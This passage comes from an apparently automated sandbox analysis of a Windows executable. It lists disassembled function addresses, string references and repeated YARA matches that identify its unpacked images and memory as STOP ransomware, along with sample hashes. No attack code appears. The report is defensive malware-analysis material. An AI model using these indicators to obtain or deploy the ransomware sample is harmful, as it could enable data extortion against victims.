          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E0D1A44_2_05E0D1A4
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E2E1414_2_05E2E141
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE91204_2_05DE9120
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DF00D04_2_05DF00D0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE30F04_2_05DE30F0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE70E04_2_05DE70E0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEB0B04_2_05DEB0B0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEB0004_2_05DEB000
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DFF0304_2_05DFF030
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEA0264_2_05DEA026
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE73934_2_05DE7393
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E2E37C4_2_05E2E37C
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E622C04_2_05E622C0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE72204_2_05DE7220
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE5DF74_2_05DE5DF7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE5DE74_2_05DE5DE7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E22D1E4_2_05E22D1E
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E14E9F4_2_05E14E9F
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE8E604_2_05DE8E60
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE89D04_2_05DE89D0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE59F74_2_05DE59F7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E0E9A34_2_05E0E9A3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E0F9B04_2_05E0F9B0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEA9164_2_05DEA916
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05E018D04_2_05E018D0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE78804_2_05DE7880
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DEDBE04_2_05DEDBE0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE2B604_2_05DE2B60
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DF0B004_2_05DF0B00
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE7A804_2_05DE7A80
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DECA104_2_05DECA10
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00419F905_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040C0705_2_0040C070
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0042E0035_2_0042E003
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004080305_2_00408030
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004101605_2_00410160
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004021C05_2_004021C0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0044237E5_2_0044237E
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004084C05_2_004084C0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004344FF5_2_004344FF
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0043E5A35_2_0043E5A3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040A6605_2_0040A660
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0041E6905_2_0041E690
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004067405_2_00406740
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004027505_2_00402750
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040A7105_2_0040A710
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004087805_2_00408780
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0042C8045_2_0042C804
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004068805_2_00406880
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004349F35_2_004349F3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004069F35_2_004069F3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00402B805_2_00402B80
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00406B805_2_00406B80
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0044ACFF5_2_0044ACFF
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0042CE515_2_0042CE51
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00434E0B5_2_00434E0B
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00406EE05_2_00406EE0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00420F305_2_00420F30
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004050575_2_00405057
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0042F0105_2_0042F010
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004070E05_2_004070E0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004391F65_2_004391F6
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040D2405_2_0040D240
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004352405_2_00435240
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004C93435_2_004C9343
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004054475_2_00405447
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004054575_2_00405457
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004495065_2_00449506
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0044B5B15_2_0044B5B1
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004356755_2_00435675
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004096865_2_00409686
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040F7305_2_0040F730
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0044D7A15_2_0044D7A1
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004819205_2_00481920
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0044D9DC5_2_0044D9DC
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00449A715_2_00449A71
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00443B405_2_00443B40
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00409CF95_2_00409CF9
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040DD405_2_0040DD40
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00427D6C5_2_00427D6C
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0040BDC05_2_0040BDC0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00409DFA5_2_00409DFA
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00409F765_2_00409F76
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_0046BFE05_2_0046BFE0
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_00449FE35_2_00449FE3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 05DF8EC0 appears 57 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00428C81 appears 84 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00420EC2 appears 40 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 004547A0 appears 150 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00422587 appears 48 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 05E10160 appears 50 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 05E08EC0 appears 57 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 0042F7C0 appears 194 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 0044F23E appears 106 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00428520 appears 154 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 05E00160 appears 50 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00425007 appears 36 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00450870 appears 52 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00454E50 appears 82 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 00441A25 appears 44 times
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: String function: 0044F26C appears 40 times
          Source: mU2p71KMss.exe, 00000000.00000002.1989938513.00000000040A1000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 00000001.00000000.1987483622.00000000040A1000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 00000001.00000003.2003281151.00000000030B1000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 00000004.00000002.2012281123.00000000040A1000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 00000005.00000000.2010038199.00000000040A1000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 00000006.00000000.2017321757.00000000040A1000.00000002.00000001.01000000.00000007.sdmp, Binary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 00000007.00000000.2021981173.00000000040A1000.00000002.00000001.01000000.00000007.sdmp, Binary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 00000009.00000002.2155871497.00000000040A1000.00000002.00000001.01000000.00000007.sdmp, Binary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 0000000A.00000000.2152407463.00000000040A1000.00000002.00000001.01000000.00000007.sdmp, Binary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 0000000C.00000002.2241186522.00000000040A1000.00000002.00000001.01000000.00000007.sdmp, Binary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, 0000000D.00000000.2236703964.00000000040A1000.00000002.00000001.01000000.00000007.sdmp, Binary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, Binary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe.1.dr, Binary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe.7.dr, Binary or memory string: OriginalFilenameFirez( vs mU2p71KMss.exe
          Source: mU2p71KMss.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 13.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 13.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 5.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 5.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 10.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 10.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 1.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 1.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 5.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 5.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 9.2.mU2p71KMss.exe.5c815a0.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 7.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 7.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 13.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 13.2.mU2p71KMss.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 1.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 1.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 6.2.mU2p71KMss.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0.2.mU2p71KMss.exe.5dd15a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 10.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 10.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 12.2.mU2p71KMss.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 7.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 7.2.mU2p71KMss.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 4.2.mU2p71KMss.exe.5de15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
